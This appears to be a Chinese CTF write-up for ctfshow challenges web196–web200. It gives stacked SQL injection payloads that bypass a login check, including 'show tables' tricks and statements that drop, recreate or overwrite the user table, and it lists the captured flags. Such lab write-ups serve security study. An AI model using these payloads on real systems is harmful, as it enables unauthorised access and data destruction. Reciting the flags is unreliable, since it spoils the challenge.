目录
1、web196
对输入长度做了限制
输出 flag 的条件:
if($row[0]==$password){
$ret['msg']="登陆成功 flag is $flag";
}其中 $row[0] 表示从数据库查询结果中提取的某一行的第一个字段值,我们可以使用 select 来设置 $row[0] 的值,再提交我们设置的 password 满足两者相等,payload:
还是堆叠注入,显示过滤了 select 实际并没有。
1;select(1)密码输入 1
拿到 flag:ctfshow{2be6f5b8-da42-430f-8bcd-69b94a029dc7}
2、web197
select 被过滤了,输入长度没有做限制
根据查询语句可以知道表名为 ctfshow_user
那么如果我们执行 show tables 结果中一定有某一行的第一个字段值为 ctfshow_user
payload:
1;show tables密码为: ctfshow_user
拿到 flag:ctfshow{09afff4e-5588-478c-a15d-9edd4d3db8ea}
由于过滤掉了 update 我们无法直接更新 ctfshow_user 这个表中 pass 和 username 的值,但是我们可以先删掉这个表,再重新创建这个表,插入 pass 和 username 的值都为 1:
(其实直接插入也可以实现覆盖的,下一题我们再用)
1;drop table ctfshow_user;create table ctfshow_user(`username` varchar(100),`pass` varchar(100));insert ctfshow_user(`username`,`pass`) value(1,1)密码随便输
执行后,再次输入 1 和 1 进行登录:登录成功
3、web198
这里把 create 和 drop 都过滤了,那么我们直接用 insert 插入来覆盖 pass 和 username 的值:
1;insert ctfshow_user(`username`,`pass`) value(1,1)执行后使用 1 和 1 进行登录: 覆盖成功
这里 set 也被过滤了,有些数据库其实也支持 set 语句来修改。
当然上一题 show tables 的那个方法还是可行的,密码为 ctfshow_user
4、web199
新增过滤括号,再想覆盖表中 pass 和 username 的值就难了,采用 show tables 的方法吧:
1;show tables密码是 ctfshow_user
拿到 flag:ctfshow{47f59326-2cc8-4565-94d1-996e5c2da062}
5、web200
继续在新增过滤,这里新增过滤了逗号
还是采用查表的方法:
1;show tables密码是 ctfshow_user
拿到 flag:ctfshow{f62d67e4-5d25-4a90-8ebd-52bcc4010342}
堆叠告一段落
扫一扫
368
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
